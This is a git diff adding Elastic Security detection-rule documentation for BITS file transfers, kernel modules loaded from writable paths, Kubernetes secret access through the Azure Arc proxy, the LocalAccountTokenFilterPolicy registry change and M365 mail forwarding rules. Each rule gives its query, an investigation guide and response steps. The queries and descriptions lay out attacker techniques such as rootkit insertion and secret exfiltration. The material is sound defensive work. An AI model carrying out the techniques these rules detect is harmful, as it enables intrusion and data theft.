+*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Ingress Transfer via Windows BITS* + + +Windows Background Intelligent Transfer Service (BITS) is a technology that allows the transfer of files between a client and a server, which makes it a dual-use mechanism, being used by both legitimate apps and attackers. When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process, which can bypass security protections, and it helps to obscure which application requested the transfer. + +This rule identifies such abuse by monitoring for file renaming events involving "svchost.exe" and "BIT*.tmp" on Windows systems. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Gain context into the BITS transfer. + - Try to determine the process that initiated the BITS transfer. + - Search `bitsadmin.exe` processes and examine their command lines. + - Look for unusual processes loading `Bitsproxy.dll` and other BITS-related DLLs. + - Try to determine the origin of the file. + - Inspect network connections initiated by `svchost.exe`. + - Inspect `Microsoft-Windows-Bits-Client/Operational` Windows logs, specifically the event ID 59, for unusual events. + - Velociraptor can be used to extract these entries using the https://docs.velociraptor.app/exchange/artifacts/pages/bitsadmin/[bitsadmin artifact]. + - Check the reputation of the remote server involved in the BITS transfer, such as its IP address or domain, using threat intelligence platforms or online reputation services. + - Check if the domain is newly registered or unexpected. + - Use the identified domain as an indicator of compromise (IoCs) to scope other compromised hosts in the environment. + - https://github.com/fireeye/BitsParser[BitsParser] can be used to parse BITS database files to extract BITS job information. +- Examine the details of the dropped file, and whether it was executed. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the involved executables using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + + +*False positive analysis* + + +- Known false positives for the rule include legitimate software and system updates that use BITS for downloading files. + + +*Related Rules* + + +- Persistence via BITS Job Notify Cmdline - c3b915e0-22f3-4bf7-991d-b643513c722f +- Unsigned BITS Service Client Process - 9a3884d0-282d-45ea-86ce-b9c81100f026 +- Bitsadmin Activity - 8eec4df1-4b4b-4502-b6c3-c788714604c9 + + +*Response and Remediation* + + +- Initiate the incident response process based on the outcome of the triage. + - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.action == "rename" and + process.name : "svchost.exe" and file.Ext.original.name : "BIT*.tmp" and + (file.extension : ("exe", "zip", "rar", "bat", "dll", "ps1", "vbs", "vbe", "wsh", "wsf", "sct", "js", "jse", "hta", "pif", "scr", "cmd", "cpl") or + file.Ext.header_bytes : "4d5a*") and + + /* noisy paths, for hunting purposes you can use the same query without the following exclusions */ + not file.path : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*", "?:\\Windows\\*", "?:\\ProgramData\\*\\*") and + + /* lot of third party SW use BITS to download executables with a long file name */ + not length(file.name) > 30 and + not file.path : ( + "?:\\Users\\*\\AppData\\Local\\Temp*\\wct*.tmp", + "?:\\Users\\*\\AppData\\Local\\Adobe\\ARM\\*\\RdrServicesUpdater*.exe", + "?:\\Users\\*\\AppData\\Local\\Adobe\\ARM\\*\\AcroServicesUpdater*.exe", + "?:\\Users\\*\\AppData\\Local\\Docker Desktop Installer\\update-*.exe" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: BITS Jobs +** ID: T1197 +** Reference URL: https://attack.mitre.org/techniques/T1197/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc new file mode 100644 index 0000000000..b6a2472045 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc @@ -0,0 +1,179 @@ +[[prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location]] +=== Kernel Module Load from Unusual Location + +This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Threat: Rootkit +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Kernel Module Load from Unusual Location* + + +This rule detects attempts to load Linux kernel modules from atypical directories, which can indicate an attacker trying to run code in kernel space for stealth and long-term persistence. Adversaries often drop a malicious `.ko` into writable paths like `/tmp` or `/dev/shm` after initial access, then use `insmod` or `modprobe` to insert it and hide processes, files, or network activity as a rootkit. + + +*Possible investigation steps* + + +- Capture the full command line and resolve any referenced `.ko` path, then collect the module file for hashing and static analysis to determine provenance and known-malware matches. +- Confirm whether the module is currently loaded by querying `lsmod`/`/proc/modules`, then map it to its on-disk location with `modinfo -n ` (or `/sys/module//sections/*`) to validate it was loaded from the suspicious directory. +- Review recent kernel and audit telemetry (`dmesg`, `/var/log/kern.log`, `journalctl -k`, and any audit records) around the event time for insertion messages, signature/taint indicators, and any follow-on errors suggesting tampering. +- Identify the initiating user/session and execution chain (parent process tree, TTY/SSH source, container context), then determine whether the action aligns with legitimate admin activity or coincides with other compromise signals on the host. +- Hunt for persistence and repeatability by checking for recurring module-load attempts and inspecting boot-time and scheduled execution paths (systemd units, init scripts, cron, rc.local) that could reload the module after reboot. + + +*False positive analysis* + + +- A system administrator or automated maintenance workflow may build or test an out-of-tree kernel module and load it with `insmod`/`modprobe` from a staging directory such as `/tmp`, `/root`, or `/mnt` before installing it into standard module paths. +- A legitimate bootstrapping or recovery operation may load a required driver module from nonstandard media or temporary runtime locations (e.g., `/boot`, `/run`, `/var/run`, or `/mnt`) during troubleshooting, initramfs/early-boot tasks, or mounting encrypted/storage devices. + + +*Response and remediation* + + +- Isolate the affected Linux host from the network and disable external access (e.g., revoke SSH keys or block inbound SSH) to prevent additional module loads or lateral movement while preserving evidence. +- If the suspicious module is currently loaded, record `lsmod` and `modinfo` output, then unload it where safe (`modprobe -r `/`rmmod `) and quarantine the corresponding `.ko` from the unusual path (e.g., `/tmp`, `/dev/shm`, `/home`, `/mnt`) for hashing and malware analysis. +- Remove persistence mechanisms that would reload the module by deleting or disabling any related systemd units, init scripts, cron entries, and boot-time hooks, and validate `/etc/modules-load.d/`, `/lib/modules/$(uname -r)/`, and `depmod` outputs for unauthorized additions. +- Recover the host by restoring known-good kernel/module packages and rebuilding the initramfs, then reboot and verify no unexpected modules remain in `/proc/modules` and no new load attempts occur from writable directories. +- Escalate immediately to IR/forensics and consider full host rebuild if the module is unsigned/unknown, the kernel is tainted, module removal fails, or post-reboot evidence indicates stealth behavior consistent with a rootkit. +- Harden by restricting module loading (enable Secure Boot/module signature enforcement where supported, set `kernel.modules_disabled=1` after boot on fixed-function systems, and limit `CAP_SYS_MODULE` to trusted admins), and enforce file integrity monitoring/permissions to prevent `.ko` creation in world-writable locations. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + (process.name == "kmod" and process.args == "insmod" and process.args like~ "*.ko*") or + (process.name == "kmod" and process.args == "modprobe" and not process.args in ("-r", "--remove")) or + (process.name == "insmod" and process.args like~ "*.ko*") or + (process.name == "modprobe" and not process.args in ("-r", "--remove")) +) and ( + process.working_directory like ( + "/tmp*", "/var/tmp*", "/dev/shm*", "/run*", "/var/run*", "/home*/*", "/root*", + "/var/www*", "/boot*", "/srv*", "/mnt*", "/media*" + ) or + process.parent.working_directory like ( + "/tmp*", "/var/tmp*", "/dev/shm*", "/run*", "/var/run*", "/home*/*", "/root*", + "/var/www*", "/boot*", "/srv*", "/mnt*", "/media*" + ) or + process.args like ( + "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/run/*", "/var/run/*", "/home/*/*", "/root/*", + "/var/www/*", "/boot/*", "/srv/*", "/mnt/*", "/media/*", "./*" + ) +) and +not ( + process.parent.executable == "/usr/bin/podman" or + process.working_directory like "/tmp/newroot" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Rootkit +** ID: T1014 +** Reference URL: https://attack.mitre.org/techniques/T1014/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc new file mode 100644 index 0000000000..28bbe0754b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc @@ -0,0 +1,141 @@ +[[prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy]] +=== Kubernetes Secret or ConfigMap Access via Azure Arc Proxy + +Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 9m + +*Searches indices from*: now-5d ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect +* https://microsoft.github.io/Threat-Matrix-for-Kubernetes/ +* https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence +* https://cloud.google.com/blog/topics/threat-intelligence/escalating-privileges-azure-kubernetes-services +* https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-3-from-compromis + +*Tags*: + +* Data Source: Kubernetes +* Domain: Kubernetes +* Domain: Cloud +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Kubernetes Secret or ConfigMap Access via Azure Arc Proxy* + + +When Kubernetes operations are performed through Azure Arc Cluster Connect, the K8s audit log shows the Arc AAD proxy +service account as the authenticated user, with the actual Azure AD identity in the `impersonatedUser` field. This +rule detects non-system secret and configmap access — including reads, writes, and deletions — routed through this +proxy path. Read operations (`get`, `list`) are particularly important to detect as they represent the most common +adversary action: exfiltrating secrets without leaving obvious modification traces. + + +*Possible investigation steps* + + +- Check the `kubernetes.audit.impersonatedUser.username` field — this contains the Azure AD object ID of the actual + caller. Cross-reference with Azure AD to identify the service principal or user. +- Review the `kubernetes.audit.impersonatedUser.extra.oid` field for the Azure AD object ID. +- Examine the namespace — operations in `default` or application namespaces are more suspicious than `azure-arc` or + `kube-system`. +- Check the `kubernetes.audit.objectRef.name` — look for suspicious secret/configmap names that don't match known + application resources. +- Correlate with Azure Activity Logs for the same time window to find the `LISTCLUSTERUSERCREDENTIAL` operation that + initiated the Arc proxy session. +- Review Azure Sign-In Logs for the impersonated identity's authentication source IP and geolocation. + + +*Response and remediation* + + +- If the impersonated identity is not recognized, revoke its Azure AD credentials immediately. +- Remove the ClusterRoleBinding or RoleBinding that grants the identity access to secrets/configmaps. +- Rotate any Kubernetes secrets that may have been read or exfiltrated. +- Review the Arc connection and consider disconnecting it if compromised. + + +==== Rule query + + +[source, js] +---------------------------------- +FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index +| WHERE STARTS_WITH(kubernetes.audit.user.username, "system:serviceaccount:azure-arc:") + AND kubernetes.audit.objectRef.resource IN ("secrets", "configmaps") + AND kubernetes.audit.verb IN ("get", "list", "create", "update", "patch", "delete") + AND kubernetes.audit.objectRef.namespace NOT IN ("azure-arc", "azure-arc-release", "kube-system") + AND NOT STARTS_WITH(kubernetes.audit.objectRef.name, "sh.helm.release.v1") + +| STATS + Esql.verb_values = VALUES(kubernetes.audit.verb), + Esql.resource_type_values = VALUES(kubernetes.audit.objectRef.resource), + Esql.resource_name_values = VALUES(kubernetes.audit.objectRef.name), + Esql.namespace_values = VALUES(kubernetes.audit.objectRef.namespace), + Esql.acting_user_values = VALUES(kubernetes.audit.user.username), + Esql.user_agent_values = VALUES(kubernetes.audit.userAgent), + Esql.source_ips_values = VALUES(kubernetes.audit.sourceIPs), + Esql.response_code_values = VALUES(kubernetes.audit.responseStatus.code), + Esql.timestamp_first_seen = MIN(@timestamp), + Esql.timestamp_last_seen = MAX(@timestamp), + Esql.event_count = COUNT(*) + BY kubernetes.audit.impersonatedUser.username + +| WHERE Esql.timestamp_first_seen >= NOW() - 9 minutes +| KEEP * + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Container API +** ID: T1552.007 +** Reference URL: https://attack.mitre.org/techniques/T1552/007/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc new file mode 100644 index 0000000000..96938d5e35 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled]] +=== Local Account TokenFilter Policy Disabled + +Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.registry-* +* logs-windows.sysmon_operational-* +* endgame-* +* logs-sentinel_one_cloud_funnel.* +* logs-m365_defender.event-* +* logs-crowdstrike.fdr* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439 +* https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167 +* https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 318 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Local Account TokenFilter Policy Disabled* + + +The LocalAccountTokenFilterPolicy is a Windows registry setting that, when enabled, allows remote connections from local administrators to use full high-integrity tokens. Adversaries may exploit this to bypass User Account Control (UAC) and gain elevated privileges remotely. The detection rule monitors changes to this registry setting, identifying potential unauthorized modifications that could indicate an attempt to facilitate lateral movement or evade defenses. + + +*Possible investigation steps* + + +- Review the registry event logs to confirm the change to the LocalAccountTokenFilterPolicy setting, specifically looking for entries where the registry.value is "LocalAccountTokenFilterPolicy" and registry.data.strings is "1" or "0x00000001". +- Identify the user account and process responsible for the registry modification by examining the associated event logs for user and process information. +- Check for any recent remote connections to the affected system, focusing on connections initiated by local administrator accounts, to determine if the change was exploited for lateral movement. +- Investigate any other recent registry changes on the host to identify potential patterns of unauthorized modifications that could indicate broader malicious activity. +- Correlate the event with other security alerts or logs from data sources like Elastic Endgame, Elastic Defend, Sysmon, SentinelOne, or Microsoft Defender for Endpoint to gather additional context and assess the scope of the potential threat. +- Assess the system for signs of compromise or malicious activity, such as unusual processes, network connections, or file modifications, that may have occurred around the time of the registry change. + + +*False positive analysis* + + +- Administrative tools or scripts that modify the LocalAccountTokenFilterPolicy for legitimate configuration purposes may trigger alerts. To manage this, identify and document these tools, then create exceptions for their known registry changes. +- System updates or patches that adjust registry settings as part of their installation process can cause false positives. Monitor update schedules and correlate alerts with these activities to determine if they are benign. +- Security software or management solutions that enforce policy changes across endpoints might modify this registry setting. Verify these actions with your IT or security team and consider excluding these processes from triggering alerts. +- Custom scripts or automation tasks used for system hardening or configuration management may alter this setting. Review these scripts and whitelist their expected changes to prevent unnecessary alerts. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement. +- Revert the registry setting for LocalAccountTokenFilterPolicy to its default state if it was modified without authorization. +- Conduct a thorough review of recent administrative activities and access logs on the affected system to identify any unauthorized access or changes. +- Reset passwords for all local administrator accounts on the affected system to prevent potential misuse of compromised credentials. +- Deploy endpoint detection and response (EDR) tools to monitor for any further suspicious activities or attempts to modify registry settings. +- Escalate the incident to the security operations center (SOC) for further investigation and to determine if the threat is part of a larger attack campaign. +- Implement additional network segmentation and access controls to limit administrative access to critical systems and reduce the risk of similar threats. + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + registry.value : "LocalAccountTokenFilterPolicy" and + registry.path : ( + "HKLM\\*\\LocalAccountTokenFilterPolicy", + "\\REGISTRY\\MACHINE\\*\\LocalAccountTokenFilterPolicy", + "MACHINE\\*\\LocalAccountTokenFilterPolicy" + ) and registry.data.strings : ("1", "0x00000001") and + not process.executable : ( + /* Intune */ + "C:\\Windows\\system32\\deviceenroller.exe", + "C:\\Windows\\system32\\omadmclient.exe", + "C:\\Windows\\UUS\\amd64\\MoUsoCoreWorker.exe", + "C:\\Windows\\UUS\\Packages\\Preview\\amd64\\MoUsoCoreWorker.exe", + + /* Crowdstrike specific exclusion as it uses NT Object paths */ + "\\Device\\HarddiskVolume*\\system32\\deviceenroller.exe", + "\\Device\\HarddiskVolume*\\system32\\omadmclient.exe", + "\\Device\\HarddiskVolume*\\UUS\\amd64\\MoUsoCoreWorker.exe", + "\\Device\\HarddiskVolume*\\UUS\\Packages\\Preview\\amd64\\MoUsoCoreWorker.exe" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Pass the Hash +** ID: T1550.002 +** Reference URL: https://attack.mitre.org/techniques/T1550/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc new file mode 100644 index 0000000000..5d55c50b06 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc @@ -0,0 +1,140 @@ +[[prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created]] +=== M365 Exchange Inbox Forwarding Rule Created + +Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. + +*Rule type*: eql + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide +* https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Domain: Email +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Configuration Audit +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 213 + +*Rule authors*: + +* Elastic +* Gary Blackwell +* Austin Songer +* Marco Pedrinazzi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating M365 Exchange Inbox Forwarding Rule Created* + + +Microsoft 365 allows users to create inbox rules to automate email management, such as forwarding messages to another address. While useful, attackers can exploit these rules to secretly redirect emails, facilitating data exfiltration. The detection rule monitors for the creation of such forwarding rules, focusing on successful events that specify forwarding parameters, thus identifying potential unauthorized email redirection activities. + + +*Possible investigation steps* + + +- Review the event details to identify the user account associated with the creation of the forwarding rule by examining the o365.audit.Parameters. +- Check the destination email address specified in the forwarding rule (ForwardTo, ForwardAsAttachmentTo, or RedirectTo) to determine if it is an external or suspicious address. +- Investigate the user's recent activity logs in Microsoft 365 to identify any unusual or unauthorized actions, focusing on event.dataset:o365.audit and event.provider:Exchange. +- Verify if the user has a legitimate reason to create such a forwarding rule by consulting with their manager or reviewing their role and responsibilities. +- Assess if there have been any recent security incidents or alerts related to the user or the destination email address to identify potential compromise. +- Consider disabling the forwarding rule temporarily and notifying the user and IT security team if the rule appears suspicious or unauthorized. + + +*False positive analysis* + + +- Legitimate forwarding rules set by users for convenience or workflow purposes may trigger alerts. Review the context of the rule creation, such as the user and the destination address, to determine if it aligns with normal business operations. +- Automated systems or third-party applications that integrate with Microsoft 365 might create forwarding rules as part of their functionality. Identify these systems and consider excluding their associated accounts from the rule. +- Temporary forwarding rules set during user absence, such as vacations or leaves, can be mistaken for malicious activity. Implement a process to document and approve such rules, allowing for their exclusion from monitoring during the specified period. +- Internal forwarding to trusted domains or addresses within the organization might not pose a security risk. Establish a list of trusted internal addresses and configure exceptions for these in the detection rule. +- Frequent rule changes by specific users, such as IT administrators or support staff, may be part of their job responsibilities. Monitor these accounts separately and adjust the rule to reduce noise from expected behavior. + + +*Response and remediation* + + +- Immediately disable the forwarding rule by accessing the affected user's mailbox settings in Microsoft 365 and removing any unauthorized forwarding rules. +- Conduct a thorough review of the affected user's email account for any signs of compromise, such as unusual login activity or unauthorized changes to account settings. +- Reset the password for the affected user's account and enforce multi-factor authentication (MFA) to prevent further unauthorized access. +- Notify the user and relevant IT security personnel about the incident, providing details of the unauthorized rule and any potential data exposure. +- Escalate the incident to the security operations team for further investigation and to determine if other accounts may have been targeted or compromised. 